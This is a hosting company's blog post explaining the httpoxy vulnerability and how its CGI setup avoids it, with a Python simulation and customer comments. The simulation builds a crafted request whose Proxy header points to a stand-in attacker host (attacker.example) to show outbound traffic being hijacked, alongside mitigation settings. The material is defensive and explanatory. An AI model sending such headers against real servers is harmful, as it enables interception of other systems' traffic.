Safe from httpoxy Vulnerability or How Thinking Ahead Pays Off

A dangerous, easy-to-exploit vulnerability called httpoxy, first discovered 15 years ago, resurfaced yesterday, leaving server-side website software potentially open to attackers. The security hole affects a large number of PHP and CGI web applications: code that runs in a CGI or CGI-like environment under PHP, Apache, Go, HHVM or Python can be vulnerable. The exploit lets an attacker redirect the application's outgoing HTTP requests through a proxy of their choosing, a man-in-the-middle position from which they can read or modify that traffic and, depending on what the application does with the responses, potentially gain control over its behaviour. Thanks to our unique in-house developed systems and some precautions taken ahead of time by our DevOps team, SiteGround customers are unaffected by the return of the vulnerability.

How does the exploit work?

The attacker sends the application a request carrying a crafted Proxy HTTP header. Under the CGI rules, every request header is exported to the application's environment under its name upper-cased and prefixed with HTTP_, so a Proxy header turns into an environment variable called HTTP_PROXY. That name collides with the variable many HTTP client libraries read to find their outgoing proxy, so the application then sends its outgoing plain-HTTP connections through whatever proxy server the attacker named. By pointing HTTP_PROXY at a malicious server, the attacker can intercept the web app's connections to other systems (API calls, payment gateways, internal services) and, depending on how the code handles what comes back, potentially gain remote code execution. Two caveats: HTTP_PROXY only governs plain http:// connections, so requests the application makes over HTTPS are not redirected, and only code that actually makes outbound HTTP requests while serving a client request is exposed. The best immediate mitigation is to block Proxy request headers as early as possible, before they reach your application.

How did we avoid being affected by the vulnerability?

We run our own unique in-house PHP and CGI setup, developed in 2007 and maintained and improved ever since. Back when our DevOps team built it, they were aware that a client-supplied Proxy header could be confused with proxy configuration. As a precaution, they excluded the Proxy header from our list of request headers that are allowed to become environment parameters. This means we do not even need to unset the HTTP_PROXY variable, as the security advisories suggest: the header is simply never exported, so it cannot reach any application on our servers.
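The mechanism described in "How does the exploit work?" and the header-exclusion approach described just above, as an added Python simulation (not SiteGround's code and not the code of any of the affected projects): a raw HTTP request carrying an attacker-chosen Proxy header, the CGI rule that turns request headers into HTTP_* environment variables, a model of a proxy-aware client library that honours HTTP_PROXY for outbound plain-HTTP calls, and a hardened gateway that never exports the header. The hostnames, the request, and the outbound URLs are constructed for the example; RESERVED_META_VARIABLES is this example's own name for the set of header-derived variables a gateway refuses to pass through.

```python
"""
Simulation of the httpoxy mechanism: how a client-supplied "Proxy" request
header becomes HTTP_PROXY under the CGI header-to-environment mapping
(RFC 3875, section 4.1.18), how a naive client library then honours it, and
how a gateway that refuses to export the header closes the hole.
"""
from urllib.parse import urlsplit

# Constructed request, the kind an attacker sends. attacker.example is an
# assumed attacker-controlled host; shop.example is the assumed victim.
ATTACKER_REQUEST = (
    "GET /checkout HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "User-Agent: curl/7.49.0\r\n"
    "Proxy: http://attacker.example:8080\r\n"
    "\r\n"
)

# Constructed outbound calls the application makes while serving the request.
OUTBOUND_URLS = [
    "http://payments.internal.example/api/charge",   # plain HTTP: hijackable
    "https://payments.internal.example/api/charge",  # TLS: not governed by HTTP_PROXY
]

# Header-derived meta-variables that client libraries read as configuration.
# HTTP_PROXY is the one httpoxy abuses; keeping the set extensible is this
# example's choice, not a catalogue from the article.
RESERVED_META_VARIABLES = {"HTTP_PROXY"}


def parse_request_headers(raw):
    """Return the header fields of a raw HTTP/1.1 request as (name, value)
    pairs, preserving order and duplicates."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]            # drop the request line
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def cgi_meta_variables(headers):
    """Naive RFC 3875 mapping: upper-case the name, turn '-' into '_', prefix
    with HTTP_. 'Proxy' therefore lands in HTTP_PROXY, the variable that
    proxy-aware client libraries treat as their proxy setting."""
    env = {}
    for name, value in headers:
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def hardened_cgi_meta_variables(headers):
    """Same mapping, but a header whose meta-variable would collide with a
    reserved configuration variable is dropped before the environment is
    built: excluded from the allowed list rather than unset afterwards."""
    env = {}
    for name, value in headers:
        meta = "HTTP_" + name.upper().replace("-", "_")
        if meta in RESERVED_META_VARIABLES:
            continue
        env[meta] = value
    return env


def choose_upstream(env, url):
    """Model of a proxy-aware client (Guzzle, Go's net/http or Python's urllib
    before their httpoxy fixes): for an http:// URL it connects to the host
    named in HTTP_PROXY when that variable is set; https:// URLs are not
    routed through HTTP_PROXY."""
    target = urlsplit(url)
    proxy = env.get("HTTP_PROXY")
    if target.scheme == "http" and proxy:
        return urlsplit(proxy).netloc
    return target.netloc


def connections_made(mapper, raw_request=ATTACKER_REQUEST, urls=OUTBOUND_URLS):
    """Where each outbound call actually connects under the given gateway."""
    env = mapper(parse_request_headers(raw_request))
    return {url: choose_upstream(env, url) for url in urls}


def gateway_is_vulnerable(mapper):
    """Probe: does a client-supplied Proxy header reach HTTP_PROXY?"""
    env = mapper([("Proxy", "http://probe.example:1")])
    return env.get("HTTP_PROXY") == "http://probe.example:1"


if __name__ == "__main__":
    for label, mapper in (("naive", cgi_meta_variables),
                          ("hardened", hardened_cgi_meta_variables)):
        print(f"{label} gateway vulnerable: {gateway_is_vulnerable(mapper)}")
        for url, host in connections_made(mapper).items():
            print(f"  {url} -> {host}")
```

Under the naive gateway the plain-HTTP payment call goes to attacker.example:8080 while the HTTPS call still reaches payments.internal.example; under the hardened gateway both go direct. The same probe works against a real server: send a request with a Proxy header to a test CGI or PHP script that echoes getenv("HTTP_PROXY"), and the variable must come back empty. On stock web servers the equivalent of the hardened mapper is `RequestHeader unset Proxy early` with mod_headers on Apache, or `fastcgi_param HTTP_PROXY "";` on nginx.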

Thanks to our knowledgeable security and systems design team, we anticipated that this class of problem could resurface and proactively designed our systems to protect our clients.


Daniel Kanchev

Director Product Development

Daniel is responsible for bringing new products to life at SiteGround. This involves handling all types of tasks and communication across multiple teams. Enthusiastic about technology, user experience, security and performance, you can never be bored hanging around him. Also an occasional conference speaker and travel addict.

Comments (26)


Eric

Jul 19, 2016

Good work, SiteGround Team! By far the #1 hosting service provider out there :)


Angelina Micheva

Jul 20, 2016

Thank you, Eric!


Alvin Gan

Jul 19, 2016

Thanks, SiteGround DevOps, for thinking ahead and developing great server performance with constant performance and security fixes.


Angelina Micheva

Jul 20, 2016

Our DevOps team is amazing and they are true experts in what they do, so your sites are safe with us.


kenny

Jul 20, 2016

Beautiful, good thinking all those years ago. Glad that you communicate this as well. Keeps us aware that you are working away behind the scenes to keep our sites safe.


Erik Joling

Jul 20, 2016

Well spoken Kenny, I totally agree!


Lauro

Jul 20, 2016

Thanks to your investigations, now and even all those years ago! Excellent maintenance work, so the security of our websites is never in question!


John Cope

Jul 20, 2016

It's great to know that if I happen upon an article about the exploit I don't need to be concerned. One less thing for me to do, thanks for posting.


abrham assefa

Jul 21, 2016

I am proud of the SiteGround Team, and am happy being a customer.


Chris Olsen

Aug 10, 2016

Thank you! Glad my sites are hosted with you. Lets me focus on the website and not worry about hosting.


Alain

Aug 10, 2016

That's why I have been a happy SiteGround customer for years :)


Brian A

Aug 10, 2016

Thank you yet again to all at SiteGround.com for helping to keep your networks better protected - and therefore all the websites installed on them, and for letting us know about some of the great work you do "in the background".


Thomas Whittaker

Aug 10, 2016

#PeaceOfMind when you have SG as your BUDDY :)


Jag

Aug 10, 2016

Thank you! It is comforting. Jag KudosWall.com


aj

Aug 10, 2016

The best hosting services and support team. Thanks, SiteGround.


Alisa natal

Aug 11, 2016

You guys rock! Loving the decision to move myself and all my clients over to you. SO much better, you make the life of managing a bunch of sites so much easier. Thanks!


Ken Weill Lumacad

Aug 11, 2016

That's good news. I'm proud to be with SiteGround. Migrating to SiteGround was the best choice I made for my websites. Kudos to the SiteGround team.


Rodel

Aug 11, 2016

Best Hosting Provider Ever :) Good Siteground.... I'm so Happy.................... 101 Best Hosting..


Shayan

Aug 11, 2016

You were not my first web hosting, but seems like you are the last I will ever try :) Good luck SG.


Geoff

Aug 11, 2016

Delighted with my switch in hosting to Siteground. A******* customer service and product. Thanks guys


Jarold Villanueva

Aug 11, 2016

Nice work... Two thumbs up.... Best Hosting Ever... :-)


Carla

Aug 11, 2016

Well done Team SiteGround! Thanks for keeping us updated.


Jaswinder Kaur

Aug 11, 2016

I am happy to be an SG customer! Thanks.


Mohd Shahrizan Ahmad Yusof

Aug 13, 2016

Your super technical team is second to none and a perfect match with your famous support team, which has proven to be the best support in the world (as written in EVERY forum / website). I always wondered, if your regular support already makes us feel like VIP customers, then I believe your so-called Premium Support will definitely make us feel like royalty! As for your technical team, you guys never stop amazing us with your continuous dedication. I'm glad I chose SG as my first web-hosting company. After almost a year of being your customer, I believe that is the best decision I ever made.


Jan

May 21, 2017

Hi everyone, I am planning to host a Django-cms app. Which Python 3 version(s) are you supporting? Kind regards, Jan Nusselder


Hristo Pandjarov (SiteGround Team)

May 22, 2017

Right now we have 2.7.5 and 2.4.3 available on our servers, but we will be adding another version (3rd branch) for our customers shortly!
